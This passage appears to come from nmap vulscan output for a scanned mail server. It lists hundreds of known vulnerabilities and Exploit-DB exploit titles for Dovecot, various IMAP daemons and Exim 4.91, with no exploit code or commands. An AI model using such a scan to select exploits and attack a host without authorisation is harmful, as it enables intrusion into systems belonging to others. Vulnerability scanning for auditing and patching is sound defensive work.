9651| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
9652| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
9653| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
9654| [84478] imapd CVE-1999-1224 Denial-Of-Service Vulnerability
9655| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
9656| [67306] Dovecot Denial of Service Vulnerability
9657| [65650] Eudora WorldMail imapd 'UID' Command Buffer Overflow Vulnerability
9658| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
9659| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
9660| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
9661| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
9662| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
9663| [51403] Eudora WorldMail imapd 'LIST' Command Buffer Overflow Vulnerability
9664| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
9665| [49949] Cyrus IMAPd NTTP Logic Error Authentication Bypass Vulnerability
9666| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
9667| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
9668| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
9669| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
9670| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
9671| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
9672| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
9673| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
9674| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
9675| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
9676| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
9677| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
9678| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
9679| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
9680| [26270] Perdition IMAPD __STR_VWRITE Remote Format String Vulnerability
9681| [25733] Mercury/32 IMAPD SEARCH Command Remote Stack Buffer Overflow Vulnerability
9682| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
9683| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
9684| [23058] Atrium Mercur IMapD NTLM Buffer Overflow Vulnerability
9685| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
9686| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
9687| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
9688| [17961] Dovecot Remote Information Disclosure Vulnerability
9689| [16672] Dovecot Double Free Denial of Service Vulnerability
9690| [15980] Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
9691| [15753] Ipswitch Collaboration Suite and IMail Server IMAPD LIST Command Denial Of Service Vulnerability
9692| [12636] Cyrus IMAPD Multiple Remote Buffer Overflow Vulnerabilities
9693| [11738] Cyrus IMAPD Multiple Remote Unspecified Vulnerabilities
9694| [11729] Cyrus IMAPD Multiple Remote Vulnerabilities
9695| [6298] Cyrus IMAPD Pre-Login Heap Corruption Vulnerability
9696| [4713] Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability
9697| [2856] Imapd 'Local' Buffer Overflow Vulnerabilities
9698| [1110] Univ. Of Washington imapd Buffer Overflow Vulnerabilities
9699| [502] NT IMail Imapd Buffer Overflow DoS Vulnerability
9700| [130] imapd Buffer Overflow Vulnerability
9701|
9702| IBM X-Force - https://exchange.xforce.ibmcloud.com:
9703| [86382] Dovecot POP3 Service denial of service
9704| [84396] Dovecot IMAP APPEND denial of service
9705| [80453] Dovecot mail-search.c denial of service
9706| [71354] Dovecot SSL Common Name (CN) weak security
9707| [70325] Cyrus IMAPd NNTP security bypass
9708| [67675] Dovecot script-login security bypass
9709| [67674] Dovecot script-login directory traversal
9710| [67589] Dovecot header name denial of service
9711| [63267] Apple Mac OS X Dovecot information disclosure
9712| [62340] Dovecot mailbox security bypass
9713| [62339] Dovecot IMAP or POP3 denial of service
9714| [62256] Dovecot mailbox security bypass
9715| [62255] Dovecot ACL entry security bypass
9716| [60639] Dovecot ACL plugin weak security
9717| [57267] Apple Mac OS X Dovecot Kerberos security bypass
9718| [56763] Dovecot header denial of service
9719| [54363] Dovecot base_dir privilege escalation
9720| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
9721| [47526] UW-imapd rfc822_output_char() denial of service
9722| [46323] Dovecot dovecot.conf information disclosure
9723| [46227] Dovecot message parsing denial of service
9724| [45669] Dovecot ACL mailbox security bypass
9725| [45667] Dovecot ACL plugin rights security bypass
9726| [41085] Dovecot TAB characters authentication bypass
9727| [41009] Dovecot mail_extra_groups option unauthorized access
9728| [39342] Dovecot LDAP auth cache configuration security bypass
9729| [35767] Dovecot ACL plugin security bypass
9730| [34082] Dovecot mbox-storage.c directory traversal
9731| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
9732| [26536] Dovecot IMAP LIST information disclosure
9733| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
9734| [24709] Dovecot APPEND command denial of service
9735| [22629] RHSA-2005:408 updates for cyrus-imapd not installed
9736| [19460] Cyrus IMAP imapd buffer overflow
9737| [19455] Cyrus IMAP imapd extension off-by-one buffer overflow
9738| [18492] Novell NetMail IMAPD 101_mEna buffer overflow
9739| [10803] UW IMAP (wu-imapd) authenticated user buffer overflow
9740| [9238] UW IMAP (wu-imapd) could allow a remote attacker to access arbitrary files
9741| [9055] UW IMAP (wu-imapd) partial mailbox attributes to request buffer overflow
9742| [7345] Slackware Linux imapd and ipop3d core dump
9743| [573] Imapd denial of service
9744|
9745| Exploit-DB - https://www.exploit-db.com:
9746| [30724] Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability
9747| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
9748| [22061] Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability
9749| [21443] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2)
9750| [21442] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1)
9751| [19849] UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)
9752| [19848] UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)
9753| [19847] UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities
9754| [19377] Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability
9755| [19107] Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability
9756| [18354] WorldMail imapd 3.0 SEH overflow (egg hunter)
9757| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
9758| [16485] MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow
9759| [16482] MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
9760| [16480] MailEnable IMAPD W3C Logging Buffer Overflow
9761| [16477] Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
9762| [16475] MailEnable IMAPD (2.35) Login Request Buffer Overflow
9763| [16474] Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
9764| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
9765| [4429] Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
9766| [3627] IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit
9767| [3527] Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)
9768| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
9769| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
9770| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
9771| [1380] Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
9772| [1332] MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
9773| [1327] FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
9774| [1151] MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit
9775| [1124] IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit
9776| [915] MailEnable Enterprise 1.x Imapd Remote Exploit
9777| [903] Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
9778| [340] Linux imapd Remote Overflow File Retrieve Exploit
9779|
9780| OpenVAS (Nessus) - http://www.openvas.org:
9781| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
9782| [901025] Dovecot Version Detection
9783| [881425] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 x86_64
9784| [881403] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 x86_64
9785| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
9786| [881397] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 x86_64
9787| [881370] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 x86_64
9788| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
9789| [881318] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 x86_64
9790| [881255] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 x86_64
9791| [881050] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 i386
9792| [881049] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 i386
9793| [881007] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 i386
9794| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
9795| [880978] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 i386
9796| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
9797| [880958] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 i386
9798| [880905] CentOS Update for cyrus-imapd CESA-2009:1459 centos4 i386
9799| [880864] CentOS Update for cyrus-imapd CESA-2009:1459 centos5 i386
9800| [880826] CentOS Update for cyrus-imapd CESA-2009:1116 centos5 i386
9801| [880536] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 i386
9802| [870607] RedHat Update for dovecot RHSA-2011:0600-01
9803| [870520] RedHat Update for cyrus-imapd RHSA-2011:1508-01
9804| [870489] RedHat Update for cyrus-imapd RHSA-2011:1317-01
9805| [870471] RedHat Update for dovecot RHSA-2011:1187-01
9806| [870443] RedHat Update for cyrus-imapd RHSA-2011:0859-01
9807| [870153] RedHat Update for dovecot RHSA-2008:0297-02
9808| [864075] Fedora Update for cyrus-imapd FEDORA-2011-13832
9809| [863585] Fedora Update for cyrus-imapd FEDORA-2011-13869
9810| [863579] Fedora Update for cyrus-imapd FEDORA-2011-13860
9811| [863281] Fedora Update for cyrus-imapd FEDORA-2011-7193
9812| [863273] Fedora Update for cyrus-imapd FEDORA-2011-7217
9813| [863272] Fedora Update for dovecot FEDORA-2011-7612
9814| [863115] Fedora Update for dovecot FEDORA-2011-7258
9815| [861525] Fedora Update for dovecot FEDORA-2007-664
9816| [861394] Fedora Update for dovecot FEDORA-2007-493
9817| [861333] Fedora Update for dovecot FEDORA-2007-1485
9818| [860845] Fedora Update for dovecot FEDORA-2008-9202
9819| [860663] Fedora Update for dovecot FEDORA-2008-2475
9820| [860169] Fedora Update for dovecot FEDORA-2008-2464
9821| [860089] Fedora Update for dovecot FEDORA-2008-9232
9822| [840950] Ubuntu Update for dovecot USN-1295-1
9823| [840668] Ubuntu Update for dovecot USN-1143-1
9824| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
9825| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
9826| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
9827| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
9828| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
9829| [831590] Mandriva Update for cyrus-imapd MDVSA-2012:037 (cyrus-imapd)
9830| [831468] Mandriva Update for cyrus-imapd MDVSA-2011:149 (cyrus-imapd)
9831| [831410] Mandriva Update for cyrus-imapd MDVSA-2011:100 (cyrus-imapd)
9832| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
9833| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
9834| [831207] Mandriva Update for cyrus-imapd MDVA-2010:208 (cyrus-imapd)
9835| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
9836| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
9837| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
9838| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
9839| [800149] UW-imapd tmail and dmail BOF Vulnerabilities (Linux)
9840| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
9841| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
9842| [70696] Debian Security Advisory DSA 2377-1 (cyrus-imapd-2.2)
9843| [70407] Debian Security Advisory DSA 2318-1 (cyrus-imapd-2.2)
9844| [70259] FreeBSD Ports: dovecot
9845| [69965] Debian Security Advisory DSA 2258-1 (kolab-cyrus-imapd)
9846| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
9847| [69740] Debian Security Advisory DSA 2242-1 (cyrus-imapd-2.2)
9848| [66522] FreeBSD Ports: dovecot
9849| [66416] Mandriva Security Advisory MDVSA-2009:229-1 (cyrus-imapd)
9850| [66233] SLES10: Security update for Cyrus IMAPD
9851| [66226] SLES11: Security update for Cyrus IMAPD
9852| [66222] SLES9: Security update for Cyrus IMAPD
9853| [65938] SLES10: Security update for Cyrus IMAPD
9854| [65723] SLES11: Security update for Cyrus IMAPD
9855| [65523] SLES9: Security update for Cyrus IMAPD
9856| [65479] SLES9: Security update for cyrus-imapd
9857| [65094] SLES9: Security update for cyrus-imapd
9858| [65010] Ubuntu USN-838-1 (dovecot)
9859| [64989] CentOS Security Advisory CESA-2009:1459 (cyrus-imapd)
9860| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
9861| [64977] Debian Security Advisory DSA 1893-1 (cyrus-imapd-2.2 kolab-cyrus-imapd)
9862| [64965] Fedora Core 11 FEDORA-2009-9901 (cyrus-imapd)
9863| [64963] Fedora Core 10 FEDORA-2009-9869 (cyrus-imapd)
9864| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
9865| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
9866| [64898] FreeBSD Ports: cyrus-imapd
9867| [64864] Debian Security Advisory DSA 1881-1 (cyrus-imapd-2.2)
9868| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
9869| [64847] Fedora Core 10 FEDORA-2009-9428 (cyrus-imapd)
9870| [64846] Fedora Core 11 FEDORA-2009-9417 (cyrus-imapd)
9871| [64838] Mandrake Security Advisory MDVSA-2009:229 (cyrus-imapd)
9872| [64271] CentOS Security Advisory CESA-2009:1116 (cyrus-imapd)
9873| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
9874| [62854] FreeBSD Ports: dovecot-managesieve
9875| [61916] FreeBSD Ports: dovecot
9876| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
9877| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
9878| [60528] FreeBSD Ports: dovecot
9879| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
9880| [60089] FreeBSD Ports: dovecot
9881| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
9882| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
9883| [55807] Slackware Advisory SSA:2005-310-06 imapd
9884| [54861] Gentoo Security Advisory GLSA 200502-29 (cyrus-imapd)
9885| [54755] Gentoo Security Advisory GLSA 200411-34 (cyrus-imapd)
9886| [53739] Debian Security Advisory DSA 215-1 (cyrus-imapd)
9887| [53288] Debian Security Advisory DSA 597-1 (cyrus-imapd)
9888| [52297] FreeBSD Ports: cyrus-imapd
9889| [52296] FreeBSD Ports: cyrus-imapd
9890| [52295] FreeBSD Ports: cyrus-imapd
9891| [52294] FreeBSD Ports: cyrus-imapd
9892| [52172] FreeBSD Ports: cyrus-imapd
9893|
9894| SecurityTracker - https://www.securitytracker.com:
9895| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
9896| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
9897| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
9898| [1013278] Cyrus IMAPd Buffer Overflows in Annotate Extension, Cached Header, and Fetchnews May Let Remote Users Execute Arbitrary Code
9899|
9900| OSVDB - http://www.osvdb.org:
9901| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
9902| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
9903| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
9904| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
9905| [78304] Eudora WorldMail imapd SEH LIST Command Parsing Remote Overflow
9906| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
9907| [75445] Cyrus IMAP Server imapd index.c index_get_ids Function References Header NULL Dereference Remote DoS
9908| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
9909| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
9910| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
9911| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
9912| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
9913| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
9914| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
9915| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
9916| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
9917| [66113] Dovecot Mail Root Directory Creation Permission Weakness
9918| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
9919| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
9920| [66110] Dovecot Multiple Unspecified Buffer Overflows
9921| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
9922| [64783] Dovecot E-mail Message Header Unspecified DoS
9923| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
9924| [62796] Dovecot mbox Format Email Header Handling DoS
9925| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
9926| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
9927| [57843] Cyrus IMAP Server (cyrus-imapd) SIEVE Script Component (sieve/script.c) Crafted Script Handling Overflow
9928| [57681] UoW imap Server (uw-imapd) Arbitrary Remote File Access
9929| [52906] UW-imapd c-client Initial Request Remote Format String
9930| [52905] UW-imapd c-client Library RFC822BUFFER Routines rfc822_output_char Function Off-by-one
9931| [52456] UW-imapd on Debian Linux LOGIN Command Remote DoS
9932| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
9933| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
9934| [49485] UW-imapd dmail Utility Mailbox Name Handling Overflow
9935| [49484] UW-imapd tmail Utility Mailbox Name Handling Overflow
9936| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
9937| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
9938| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
9939| [43137] Dovecot mail_extra_groups Symlink File Manipulation
9940| [42979] Dovecot passdbs Argument Injection Authentication Bypass
9941| [42004] Perdition Mail Retrieval Proxy IMAPD IMAP Tag Remote Format String Arbitrary Code Execution
9942| [39876] Dovecot LDAP Auth Cache Security Bypass
9943| [39670] Mercury Mail Transport System IMAPD SEARCH Command Remote Overflow
9944| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
9945| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
9946| [31362] Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow
9947| [31361] Novell NetMail IMAP Daemon (IMAPD) APPEND Command DoS
9948| [31360] Novell NetMail IMAP Daemon (IMAPD) SUBSCRIBE Command Remote Overflow
9949| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
9950| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
9951| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
9952| [23281] Dovecot imap/pop3-login dovecot-auth DoS
9953| [23280] Dovecot Malformed APPEND Command DoS
9954| [18179] HP Tru64 UNIX imapd NLSPATH Environment Variable Local Overflow
9955| [13242] UW-imapd CRAM-MD5 Authentication Bypass
9956| [12385] Novell NetMail IMAPD 101_mEna Script Remote Overflow
9957| [12042] UoW imapd Multiple Unspecified Overflows
9958| [12037] UoW imapd (UW-IMAP) Multiple Command Remote Overflows
9959| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
9960| [911] UoW imapd AUTHENTICATE Command Remote Overflow
9961| [790] UoW imap Server (uw-imapd) BODY Request Remote Overflow
9962| [519] UoW imapd SIGABRT Signal Forced Crash Information Disclosure
9963|_
9964443/tcp filtered https
9965465/tcp open ssl/smtps?
9966587/tcp open smtp Exim smtpd 4.91
9967| vulscan: VulDB - https://vuldb.com:
9968| [141327] Exim up to 4.92.1 Backslash privilege escalation
9969| [138827] Exim up to 4.92 Expansion Code Execution
9970| [135932] Exim up to 4.92 privilege escalation
9971| [113048] Exim up to 4.90 SMTP Listener Message memory corruption
9972| [109969] Exim 4.88/4.89 SMTP Daemon receive.c bdat_getc denial of service
9973| [109968] Exim 4.88/4.89 SMTP Daemon receive.c receive_msg memory corruption
9974| [94599] Exim up to 4.87 information disclosure
9975| [13422] Exim 4.82 Mail Header dmarc.c expand_string memory corruption
9976| [6817] Exim up to 4.80 src/dkim.c dkim_exim_query_dns_txt memory corruption
9977| [58841] exim up to 4.69 dkim_exim_verify_finish memory corruption
9978| [57462] Exim up to 4.75 Filesystem memory corruption
9979| [4280] Exim Server 4.x open_log race condition
9980|
9981| MITRE CVE - https://cve.mitre.org:
9982| [CVE-2012-5671] Heap-based buffer overflow in the dkim_exim_query_dns_txt function in dkim.c in Exim 4.70 through 4.80, when DKIM support is enabled and acl_smtp_connect and acl_smtp_rcpt are not set to "warn control = dkim_disable_verify," allows remote attackers to execute arbitrary code via an email from a malicious DNS server.
9983| [CVE-2012-0478] The texImage2D implementation in the WebGL subsystem in Mozilla Firefox 4.x through 11.0, Firefox ESR 10.x before 10.0.4, Thunderbird 5.0 through 11.0, Thunderbird ESR 10.x before 10.0.4, and SeaMonkey before 2.9 does not properly restrict JSVAL_TO_OBJECT casts, which might allow remote attackers to execute arbitrary code via a crafted web page.
9984| [CVE-2011-1764] Format string vulnerability in the dkim_exim_verify_finish function in src/dkim.c in Exim before 4.76 might allow remote attackers to execute arbitrary code or cause a denial of service (daemon crash) via format string specifiers in data used in DKIM logging, as demonstrated by an identity field containing a % (percent) character.
9985| [CVE-2011-1407] The DKIM implementation in Exim 4.7x before 4.76 permits matching for DKIM identities to apply to lookup items, instead of only strings, which allows remote attackers to execute arbitrary code or access a filesystem via a crafted identity.
9986| [CVE-2011-0017] The open_log function in log.c in Exim 4.72 and earlier does not check the return value from (1) setuid or (2) setgid system calls, which allows local users to append log data to arbitrary files via a symlink attack.
9987| [CVE-2010-4345] Exim 4.72 and earlier allows local users to gain privileges by leveraging the ability of the exim user account to specify an alternate configuration file with a directive that contains arbitrary commands, as demonstrated by the spool_directory directive.
9988| [CVE-2010-4344] Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
9989| [CVE-2010-2024] transports/appendfile.c in Exim before 4.72, when MBX locking is enabled, allows local users to change permissions of arbitrary files or create arbitrary files, and cause a denial of service or possibly gain privileges, via a symlink attack on a lockfile in /tmp/.
9990| [CVE-2010-2023] transports/appendfile.c in Exim before 4.72, when a world-writable sticky-bit mail directory is used, does not verify the st_nlink field of mailbox files, which allows local users to cause a denial of service or possibly gain privileges by creating a hard link to another user's file.
9991| [CVE-2006-1251] Argument injection vulnerability in greylistclean.cron in sa-exim 4.2 allows remote attackers to delete arbitrary files via an email with a To field that contains a filename separated by whitespace, which is not quoted when greylistclean.cron provides the argument to the rm command.
9992| [CVE-2005-0022] Buffer overflow in the spa_base64_to_bits function in Exim before 4.43, as originally obtained from Samba code, and as called by the auth_spa_client function, may allow attackers to execute arbitrary code during SPA authentication.
9993| [CVE-2005-0021] Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.
9994| [CVE-2004-0400] Stack-based buffer overflow in Exim 4 before 4.33, when the headers_check_syntax option is enabled, allows remote attackers to cause a denial of service and possibly execute arbitrary code during the header check.
9995| [CVE-2004-0399] Stack-based buffer overflow in Exim 3.35, and other versions before 4, when the sender_verify option is true, allows remote attackers to cause a denial of service and possibly execute arbitrary code during sender verification.
9996| [CVE-2003-0743] Heap-based buffer overflow in smtp_in.c for Exim 3 (exim3) before 3.36 and Exim 4 (exim4) before 4.21 may allow remote attackers to execute arbitrary code via an invalid (1) HELO or (2) EHLO argument with a large number of spaces followed by a NULL character and a newline, which is not properly trimmed before the "(no argument given)" string is appended to the buffer.
9997| [CVE-2002-1381] Format string vulnerability in daemon.c for Exim 4.x through 4.10, and 3.x through 3.36, allows exim administrative users to execute arbitrary code by modifying the pid_file_path value.
9998|
9999| SecurityFocus - https://www.securityfocus.com/bid/:
10000| [103049] Exim 'base64d()' Function Buffer Overflow Vulnerability
10001| [99252] Exim CVE-2017-1000369 Local Privilege Escalation Vulnerability
10002| [94947] Exim CVE-2016-9963 Unspecified Information Disclosure Vulnerability
10003| [84132] Exim CVE-2016-1531 Local Privilege Escalation Vulnerability
10004| [68857] Exim CVE-2014-2972 Local Privilege Escalation Vulnerability
10005| [67695] Exim 'dmarc.c' Remote Code Execution Vulnerability
10006| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
10007| [56285] Exim DKIM DNS Decoding CVE-2012-5671 Remote Buffer Overflow Vulnerability
10008| [47836] Exim DKIM CVE-2011-1407 Remote Code Execution Vulnerability
10009| [47736] Exim 'dkim_exim_verify_finish()' Remote Format String Vulnerability
10010| [46065] Exim 'log.c' Local Privilege Escalation Vulnerability
10011| [45341] Exim ALT_CONFIG_ROOT_ONLY 'exim' User Local Privilege Escalation Vulnerability
10012| [45308] Exim Crafted Header Remote Code Execution Vulnerability
10013| [40454] Exim MBX Locking Insecure Temporary File Creation Vulnerability
10014| [40451] Exim Sticky Mail Directory Local Privilege Escalation Vulnerability
10015| [36181] ikiwiki 'teximg' Plugin Insecure TeX Commands Information Disclosure Vulnerability
10016| [23977] Exim SpamAssassin Reply Remote Buffer Overflow Vulnerability
10017| [17110] sa-exim Unauthorized File Access Vulnerability
10018| [12268] Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
10019| [12188] Exim SPA Authentication Remote Buffer Overflow Vulnerability
10020| [12185] Exim Illegal IPv6 Address Buffer Overflow Vulnerability
10021| [10291] Exim Header Syntax Checking Remote Stack Buffer Overrun Vulnerability
10022| [10290] Exim Sender Verification Remote Stack Buffer Overrun Vulnerability
10023| [8518] Exim EHLO/HELO Remote Heap Corruption Vulnerability
10024| [6314] Exim Internet Mailer Format String Vulnerability
10025| [4096] Exim Configuration File Argument Command Line Buffer Overflow Vulnerability
10026| [3728] Exim Pipe Hostname Arbitrary Command Execution Vulnerability
10027| [2828] Exim Format String Vulnerability
10028| [1859] Exim Buffer Overflow Vulnerability
10029|
10030| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10031| [84758] Exim sender_address parameter command execution
10032| [84015] Exim command execution
10033| [80186] Mozilla Firefox, Thunderbird, and SeaMonkey copyTexImage2D code execution
10034| [80184] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D calls code execution
10035| [79615] Exim dkim_exim_query_dns_txt() buffer overflow
10036| [75155] Mozilla Firefox, Thunderbird, and SeaMonkey texImage2D denial of service
10037| [67455] Exim DKIM processing code execution
10038| [67299] Exim dkim_exim_verify_finish() format string
10039| [65028] Exim open_log privilege escalation
10040| [63967] Exim config file privilege escalation
10041| [63960] Exim header buffer overflow
10042| [59043] Exim mail directory privilege escalation
10043| [59042] Exim MBX symlink
10044| [52922] ikiwiki teximg plugin information disclosure
10045| [34265] Exim spamd buffer overflow
10046| [25286] Sa-exim greylistclean.cron file deletion
10047| [22687] RHSA-2005:025 updates for exim not installed
10048| [18901] Exim dns_build_reverse buffer overflow
10049| [18764] Exim spa_base64_to_bits function buffer overflow
10050| [18763] Exim host_aton buffer overflow
10051| [16079] Exim require_verify buffer overflow
10052| [16077] Exim header_check_syntax buffer overflow
10053| [16075] Exim sender_verify buffer overflow
